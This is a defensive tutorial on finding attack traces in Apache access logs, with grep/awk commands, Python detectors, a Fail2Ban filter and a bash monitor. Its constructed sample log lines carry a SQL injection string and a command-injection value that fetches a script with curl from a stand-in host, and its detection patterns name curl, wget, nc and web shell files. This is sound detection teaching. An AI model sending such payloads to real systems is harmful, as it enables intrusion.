
Suspicious Patterns in Apache Access Logs


The Apache access log (access.log) is one of the most useful sources you have for detecting attacks, reconnaissance, brute-force attempts, exploitation and data theft as they happen. Attackers still rely on automated scanners, credential stuffing, directory brute forcing and exploit kits in 2025-2026, and all of these leave clear fingerprints in the log.

Below are the most common and most dangerous patterns of suspicious activity to look for, with practical grep/awk commands and example log lines for each. The commands assume the default "combined" log format, in which field 1 is the client IP, field 7 the request path, field 9 the status code and field 10 the response size in bytes.

The most common patterns of suspicious activity to search for:
1. Directory and file brute-forcing: repeated requests for paths that do not exist on your site (e.g. /admin, /wp-login.php, /phpmyadmin, /.env, /backup.zip), typically hundreds of them from one IP within minutes.

Typical log line:
45.79.123.45 - - [15/Feb/2025:03:14:22 +0000] "GET /wp-login.php HTTP/1.1" 404 1234 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Practical command (grep + count):
awk '$9 == 404 {print $7}' access.log | sort | uniq -c | sort -nr | head -20
→ Shows the most-requested missing paths. Swap $7 for $1 to count 404s per client IP instead: one IP producing a long tail of distinct 404'd paths is the brute-forcing signature, whereas a single broken link produces one path from many IPs.

2. SQL Injection Probes: strings such as ' OR 1=1, UNION SELECT, SLEEP(5), BENCHMARK(, CAST(, CHAR(, SUBSTRING(, @@version and information_schema in the query string. Attackers almost always URL-encode these (%27 for the quote, %20 for spaces), so search for the encoded forms too, or URL-decode the log before grepping. Avoid bare words like "select" or "char" as patterns: they match ordinary paths such as /selected-products and bury the real hits.
Practical command:
grep -Ei "union.{0,30}select|information_schema|sleep\(|benchmark\(|@@version|%27|'" access.log | tail -n 50

3. Command Injection / RCE Probes: look for shell metacharacters and the commands that usually follow them: ;, &&, |, ||, %0a (newline), $( and backticks, followed by curl, wget, bash, nc, python -c or perl -e. Keep in mind that a lone & or | appears in every query string and every legitimate URL-encoded pipe, so grep for the encoded or paired forms rather than the single characters. Also note that a backtick inside a double-quoted grep pattern is executed by the shell as command substitution, so put the pattern in single quotes.

Practical command:
grep -Ei '(%3b|;|%26%26|&&|%7c%7c|\|\||%0a|\$\(|%24%28|`|%60)|(curl|wget|bash|nc|python|perl)(%20|\+| )' access.log | tail -n 30

4. Credential Stuffing / Brute-Force Logins: rapid POST requests to /login, /wp-login.php, /admin or /phpmyadmin. Some applications answer a failed login with 401 or 403; others, WordPress included, re-render the login form with a 200 and a small response body and only send a 302 redirect on success, so a burst of 200s to wp-login.php from one IP is just as suspicious as a burst of 401s.

Practical command (top IPs by failed login attempts; add 200 to the status list for WordPress-style applications):
grep -E '"POST /(login|wp-login|admin|phpmyadmin)' access.log | awk '$9 == 401 || $9 == 403 {print $1}' | sort | uniq -c | sort -nr | head -20

5. Web Shell / Backdoor Access: repeated GET/POST requests to unusual paths such as /shell.php, /ws.php, /alfa.php, /wso.php, /c99.php or /r57.php. A 404 here means someone is checking whether a shell exists; a 200 means the file is really there and has almost certainly been planted, so treat it as a confirmed compromise rather than a probe.

Practical command:
grep -Ei "(/shell\.php|/wso\.php|/c99\.php|/r57\.php|/alfa\.php)" access.log | tail -n 50

6. Data Exfiltration / Large Downloads: one client pulling an unusually large total volume from the server, for example a database dump or backup archive left in the web root. Bear in mind what the access log can and cannot show: field 10 is the size of each response sent to the requesting client, so a client downloading a dump is visible, but a planted shell that connects out and POSTs the dump elsewhere never appears in access.log and needs firewall or NetFlow logs instead. Field 10 is "-" when no body was sent, so skip those entries.

Practical command (top client IPs by total bytes served to them):
awk '$10 != "-" {bytes[$1] += $10} END {for (ip in bytes) print bytes[ip], ip}' access.log | sort -nr | head -20
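The grep one-liners above each answer one question at a time and cannot express "N hits from one IP within five minutes". The following script, added here as an example and not part of the original post, parses combined-format lines, URL-decodes the path (twice, so double-encoded payloads are caught), applies the SQLi, command-injection and web-shell rules from patterns 2, 3 and 5, runs a sliding-window counter for the 404 bursts of pattern 1 and the login bursts of pattern 4, and sums response bytes per client for pattern 6. The log lines are constructed with RFC 5737 documentation addresses (plus the page's own first example line), the regexes and the 50-per-5-minutes threshold are my choices to tune, and the assumption that a non-3xx answer to a login POST is a failed attempt holds for WordPress but must be checked against your own application.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# Keyword rules run on the URL-decoded path, so %27 / %3B / %0a are seen as the quote,
# semicolon and newline they become. Bare "select" or "char" is deliberately not a rule:
# it fires on /selected-products and /charts and buries the real hits.
SQLI_RE = re.compile(
    r"union\s+(all\s+)?select|information_schema|\b(sleep|benchmark)\s*\(|@@version|'\s*or\s+1\s*=\s*1",
    re.I,
)
RCE_RE = re.compile(r"(;|&&|\|\||\$\(|`|\n)\s*(curl|wget|bash|sh|nc|python|perl)\b", re.I)
SHELL_RE = re.compile(r"/(shell|ws|wso|c99|r57|alfa)\.php$", re.I)
LOGIN_RE = re.compile(r"^/(login|wp-login\.php|admin|phpmyadmin)(/|\?|$)", re.I)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = e["req"].split(" ")  # "GET /path HTTP/1.1"
    e["method"] = parts[0] if parts else ""
    e["path"] = parts[1] if len(parts) > 1 else ""
    e["bytes"] = 0 if e["bytes"] == "-" else int(e["bytes"])  # "-" means no body was sent
    return e


def decode_path(path):
    """Decode twice so double-encoded payloads (%2527 -> %27 -> ') are matched as well."""
    return unquote(unquote(path))


def burst_ips(events, window, threshold):
    """IPs with at least `threshold` events inside any sliding `window`; events are (ip, ts)."""
    recent, flagged = defaultdict(deque), set()
    for ip, ts in sorted(events, key=lambda ev: ev[1]):
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(ip)
    return flagged


def analyze(lines, window=timedelta(minutes=5), burst_threshold=50):
    """Apply every rule to the given log lines and return the findings per pattern."""
    findings = {"sqli": [], "rce": [], "webshell": [], "bytes_per_ip": defaultdict(int)}
    not_found, login_attempts = [], []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue  # unparseable lines are skipped, never guessed at
        path = decode_path(e["path"])
        if SQLI_RE.search(path):
            findings["sqli"].append((e["ip"], e["path"]))
        if RCE_RE.search(path):
            findings["rce"].append((e["ip"], e["path"]))
        if SHELL_RE.search(path.split("?")[0]):
            findings["webshell"].append((e["ip"], e["path"]))
        if e["status"] == "404":
            not_found.append((e["ip"], e["ts"]))
        # Assumption (true for WordPress): a failed login re-renders the form with 200 and a
        # success redirects with 302, so every non-3xx POST to a login endpoint is an attempt.
        if e["method"] == "POST" and LOGIN_RE.search(path) and not e["status"].startswith("3"):
            login_attempts.append((e["ip"], e["ts"]))
        findings["bytes_per_ip"][e["ip"]] += e["bytes"]
    findings["bruteforce_404"] = burst_ips(not_found, window, burst_threshold)
    findings["credential_stuffing"] = burst_ips(login_attempts, window, burst_threshold)
    findings["bytes_per_ip"] = dict(findings["bytes_per_ip"])
    return findings


# Constructed sample log (documentation addresses plus the page's own first example line).
SAMPLE_LOG = [
    '45.79.123.45 - - [15/Feb/2025:03:14:22 +0000] "GET /wp-login.php HTTP/1.1" 404 1234 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '45.79.123.45 - - [15/Feb/2025:03:14:23 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 1234 "-" "Mozilla/5.0"',
    '45.79.123.45 - - [15/Feb/2025:03:14:24 +0000] "GET /.env HTTP/1.1" 404 1234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Feb/2025:03:15:01 +0000] "GET /products.php?id=1%27%20OR%201%3D1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Feb/2025:03:15:05 +0000] "GET /ping.php?host=1.1.1.1%3Bcurl%20http://198.51.100.9/x.sh HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [15/Feb/2025:03:16:10 +0000] "POST /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [15/Feb/2025:03:16:12 +0000] "POST /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [15/Feb/2025:03:16:15 +0000] "POST /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [15/Feb/2025:03:17:30 +0000] "GET /uploads/wso.php HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [15/Feb/2025:03:18:00 +0000] "GET /backup/db.sql.gz HTTP/1.1" 200 734003200 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [15/Feb/2025:03:18:05 +0000] "GET /selected-products HTTP/1.1" 200 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    f = analyze(SAMPLE_LOG, burst_threshold=3)  # 3 only for the tiny sample; start at 50 in production
    for key in ("bruteforce_404", "credential_stuffing", "sqli", "rce", "webshell"):
        print(f"{key}: {f[key]}")
    for ip, total in sorted(f["bytes_per_ip"].items(), key=lambda kv: -kv[1])[:5]:
        print(f"{total:>12} bytes -> {ip}")
```

Run it against a real file with analyze(open("access.log")) and leave burst_threshold at its default; the sample uses 3 only because it contains three requests per attacker. The one line that must not fire is /selected-products, which is exactly the false positive a bare "select" grep produces.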

7. User-Agent Anomalies
a) Scanner user-agents: sqlmap, nmap, gobuster, dirb, wfuzz, nikto
b) Fake crawlers: a Googlebot user-agent from an IP that is not Google's. Google's own advice is to verify by reverse-resolving the IP, checking that the name ends in googlebot.com or google.com, and then forward-resolving that name to confirm it points back to the same IP; the reverse lookup alone is not enough, since anyone can set a PTR record to whatever they like.
The User-Agent header is chosen by the client, so the absence of a scanner name proves nothing; serious tooling sends a normal browser string, as the fake Googlebot line in pattern 1 shows.

Practical command:
grep -Ei "sqlmap|nikto|gobuster|dirb|wfuzz|nmap" access.log | tail -n 30
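The two checks in pattern 7 carried out in code, as an added example that is not part of the original post: scanner names are matched in the user-agent, and anything claiming to be Googlebot is put through the reverse-then-forward DNS verification described above. The DNS lookups are injectable so the example runs offline against a constructed stand-in resolver; with the defaults it uses the real resolver through the socket module. The addresses, PTR names and user-agent strings in the sample are constructed (the page's own 45.79.123.45 line is included as the fake-Googlebot case), and the scanner list is mine to extend.

```python
import re
import socket

SCANNER_UA = re.compile(r"sqlmap|nikto|gobuster|dirb|wfuzz|nmap|masscan", re.I)
CLAIMS_GOOGLEBOT = re.compile(r"googlebot", re.I)
GOOGLE_SUFFIXES = ("googlebot.com", "google.com")


def default_reverse(ip):
    """PTR lookup; None when the address has no reverse record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def default_forward(name):
    """All A records for a name; empty list when it does not resolve."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except (socket.herror, socket.gaierror):
        return []


def in_google_domain(name):
    """True only for names under googlebot.com or google.com (case-insensitive, trailing dot ok)."""
    host = name.lower().rstrip(".")
    # Require the dot before the suffix so "evilgooglebot.com" is not accepted.
    return any(host == s or host.endswith("." + s) for s in GOOGLE_SUFFIXES)


def verify_googlebot(ip, reverse_lookup=default_reverse, forward_lookup=default_forward):
    """Google's published check: the PTR name must sit under googlebot.com or google.com,
    and forward-resolving that name must give back the same IP. The forward step is the one
    an impostor cannot satisfy, because they do not control Google's zones."""
    name = reverse_lookup(ip)
    if not name or not in_google_domain(name):
        return False
    return ip in forward_lookup(name)


def classify_user_agent(ip, ua, reverse_lookup=default_reverse, forward_lookup=default_forward):
    """Return one of: scanner, fake-googlebot, verified-googlebot, unflagged."""
    if SCANNER_UA.search(ua):
        return "scanner"
    if CLAIMS_GOOGLEBOT.search(ua):
        if verify_googlebot(ip, reverse_lookup, forward_lookup):
            return "verified-googlebot"
        return "fake-googlebot"
    return "unflagged"


# Constructed stand-in for DNS so the example runs offline; real runs use the socket defaults.
FAKE_PTR = {
    "66.249.66.1": "crawl-66-249-66-1.googlebot.com",     # genuine: PTR and A record agree
    "203.0.113.9": "crawl.evilgooglebot.com",             # look-alike domain
    "203.0.113.10": "googlebot.com.attacker.example",     # suffix hidden inside attacker's zone
    "203.0.113.11": "crawl-66-249-66-1.googlebot.com",    # attacker's PTR borrows a real Google name
}
FAKE_A = {
    "crawl-66-249-66-1.googlebot.com": ["66.249.66.1"],
    "crawl.evilgooglebot.com": ["203.0.113.9"],
    "googlebot.com.attacker.example": ["203.0.113.10"],
}
fake_reverse = FAKE_PTR.get                       # unknown IP -> None, like a missing PTR
fake_forward = lambda name: FAKE_A.get(name, [])  # unknown name -> [], like NXDOMAIN

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
SAMPLE = [  # constructed (ip, user-agent) pairs as they would come out of a parsed access log
    ("66.249.66.1", GOOGLEBOT_UA),
    ("45.79.123.45", GOOGLEBOT_UA),  # the page's first log line: Googlebot UA, no Google PTR
    ("203.0.113.9", GOOGLEBOT_UA),
    ("203.0.113.10", GOOGLEBOT_UA),
    ("203.0.113.11", GOOGLEBOT_UA),
    ("198.51.100.5", "sqlmap/1.8#stable (https://sqlmap.org)"),
    ("198.51.100.6", "Mozilla/5.0 (X11; Linux x86_64)"),
]


def classify_sample():
    """Classify every pair in SAMPLE using the offline resolver."""
    return {ip: classify_user_agent(ip, ua, fake_reverse, fake_forward) for ip, ua in SAMPLE}


if __name__ == "__main__":
    for ip, verdict in classify_sample().items():
        print(f"{ip:<15} {verdict}")
```

Cache the verification result per IP before running this over a day of logs: Googlebot lines are frequent and every uncached check is two DNS round trips. The same reverse-then-forward procedure applies to Bingbot and other crawlers that publish their domains; only the suffix list changes.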

Monitoring and Alerting Tools
1. GoAccess (free, real-time log visualizer)
Run goaccess access.log -o report.html --log-format=COMBINED --real-time-html to create a browser-based dashboard with live views of the top 404 paths, top client IPs, unique visitors, user agents and more.

2. Fail2Ban (Free/Auto Banning of IPs)
Write a filter that matches brute-force login attempts in the access log (for example POST requests to /wp-login.php answered with 401 or 403) and a jail that bans the source IP after a set number of matches within a time window. If the server sits behind a reverse proxy or CDN, the IP in access.log is the proxy's and banning it cuts off every visitor; log the real client address (X-Forwarded-For) first, or run Fail2Ban where the real address is visible.
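A filter and jail for the wp-login.php case, added here as an example rather than taken from the original post or from Fail2Ban's stock filters. The file names, the 20-in-10-minutes threshold and the one-hour ban are my choices; the log path is the Debian/Ubuntu default and must match your own configuration.

```ini
# /etc/fail2ban/filter.d/apache-wp-login.conf
[Definition]
# <HOST> is Fail2Ban's placeholder for the banned address. Following the stock Apache
# filters, ".*" skips the ident/user/timestamp fields up to the quoted request.
# Add |200 to the status group for WordPress installs that answer a failed login with 200.
failregex = ^<HOST> -.*"POST /wp-login\.php[^"]*" (401|403)\b
ignoreregex =

# /etc/fail2ban/jail.d/apache-wp-login.local
[apache-wp-login]
enabled  = true
port     = http,https
filter   = apache-wp-login
logpath  = /var/log/apache2/access.log
maxretry = 20
findtime = 600
bantime  = 3600
```

Test the filter against the live log with fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-wp-login.conf before enabling the jail; it prints how many lines matched and which ones, so an over-broad regex shows up before it bans anyone.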

3. Logwatch / Logcheck (free – daily summaries)
logwatch --detail High --service all --range yesterday

4. Graylog / Wazuh / Elastic (free tiers) Ingest logs → create alerts for patterns above (e.g., >50 404s from one IP in 5 minutes).

5. Simple Bash Monitoring Script
#!/bin/bash
# Follow the live log (-F survives logrotate, -n0 skips history) and alert on SQLi probes
# and scanner user-agents. Anchored patterns avoid matching ordinary words like "selected".
tail -Fn0 access.log | while IFS= read -r line; do
    if grep -qiE "union.{0,30}select|information_schema|sleep\(|benchmark\(|@@version|sqlmap|nikto" <<< "$line"; then
        echo "ALERT: Possible SQLi probe: $line"
        logger -t apache-watch -p auth.warning "Possible SQLi probe: $line"
    fi
done

Key Takeaways
Apache access logs are your earliest source of detection: attackers almost always leave footprints in them. The most dangerous patterns are:
1. Rapid 404s (brute-force)
2. SQLi probes (union, select, sleep)
3. Command injection attempts (;, &, |, curl, wget)
4. Exposed admin/debug paths
5. Credential stuffing on login endpoints
6. Suspicious user-agents

Run a quick grep daily or set up GoAccess/Fail2Ban; it takes minutes and catches most attacks early. If any of these patterns spikes from one IP or subnet, block it, but first make sure the address is the real client and not your CDN, load balancer or a shared corporate NAT, otherwise the block hits everyone behind it.

 

© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067